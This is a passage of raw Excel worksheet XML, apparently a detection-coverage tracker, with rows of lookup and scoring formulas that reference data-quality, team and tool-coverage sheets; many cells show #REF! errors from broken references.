        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L140" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M140" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N140" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O140" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P140" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q140" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R140" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S140" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T140" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U140" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V140" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W140" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X140" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y140" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="141" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A141" s="8" t="s">
        <v>81</v>
      </c>
      <c r="B141" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C141" s="25" t="s">
        <v>830</v>
      </c>
      <c r="D141" s="10" t="s">
        <v>831</v>
      </c>
      <c r="E141" s="10" t="s">
        <v>832</v>
      </c>
      <c r="F141" s="10" t="s">
        <v>833</v>
      </c>
      <c r="G141" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K141,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H141" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I141" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J141" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K141" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L141" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M141" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N141" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O141" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P141" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q141" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R141" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S141" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T141" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U141" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V141" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W141" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X141" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F141&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F141))-LEN(SUBSTITUTE(TRIM(F141),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y141" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="142" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A142" s="8" t="s">
        <v>91</v>
      </c>
      <c r="B142" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C142" s="25" t="s">
        <v>834</v>
      </c>
      <c r="D142" s="10" t="s">
        <v>835</v>
      </c>
      <c r="E142" s="10" t="s">
        <v>836</v>
      </c>
      <c r="F142" s="10" t="s">
        <v>837</v>
      </c>
      <c r="G142" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K142,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H142" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I142" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J142" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K142" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L142" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M142" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N142" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O142" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P142" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q142" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R142" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S142" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T142" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U142" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V142" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W142" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X142" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F142&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F142))-LEN(SUBSTITUTE(TRIM(F142),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y142" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="143" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A143" s="8" t="s">
        <v>99</v>
      </c>
      <c r="B143" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C143" s="25" t="s">
        <v>838</v>
      </c>
      <c r="D143" s="10" t="s">
        <v>839</v>
      </c>
      <c r="E143" s="10" t="s">
        <v>840</v>
      </c>
      <c r="F143" s="10" t="s">
        <v>841</v>
      </c>
      <c r="G143" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K143,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H143" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I143" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J143" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K143" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L143" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M143" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N143" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O143" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P143" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q143" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R143" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S143" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T143" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U143" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V143" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W143" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X143" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F143&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F143))-LEN(SUBSTITUTE(TRIM(F143),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y143" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="144" spans="1:25" ht="57" x14ac:dyDescent="0.45">
      <c r="A144" s="8" t="s">
        <v>163</v>
      </c>
      <c r="B144" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C144" s="25" t="s">
        <v>842</v>
      </c>
      <c r="D144" s="18" t="s">
        <v>843</v>
      </c>
      <c r="E144" s="10" t="s">
        <v>844</v>
      </c>
      <c r="F144" s="10" t="s">
        <v>676</v>
      </c>
      <c r="G144" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K144,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H144" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I144" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J144" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K144" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L144" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M144" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N144" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O144" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P144" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q144" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R144" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S144" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T144" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U144" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V144" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W144" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X144" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F144&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F144))-LEN(SUBSTITUTE(TRIM(F144),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y144" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="145" spans="1:25" ht="342" x14ac:dyDescent="0.45">
      <c r="A145" s="8" t="s">
        <v>143</v>
      </c>
      <c r="B145" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C145" s="25" t="s">
        <v>845</v>
      </c>
      <c r="D145" s="10" t="s">
        <v>846</v>
      </c>
      <c r="E145" s="10" t="s">
        <v>847</v>
      </c>
      <c r="F145" s="10" t="s">
        <v>848</v>
      </c>
      <c r="G145" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K145,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H145" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I145" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J145" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K145" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L145" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M145" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N145" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O145" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P145" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q145" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R145" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S145" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T145" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U145" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V145" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W145" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X145" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F145&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F145))-LEN(SUBSTITUTE(TRIM(F145),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y145" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="146" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A146" s="8" t="s">
        <v>114</v>
      </c>
      <c r="B146" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C146" s="25" t="s">
        <v>849</v>
      </c>
      <c r="D146" s="10" t="s">
        <v>850</v>
      </c>
      <c r="E146" s="10" t="s">
        <v>851</v>
      </c>
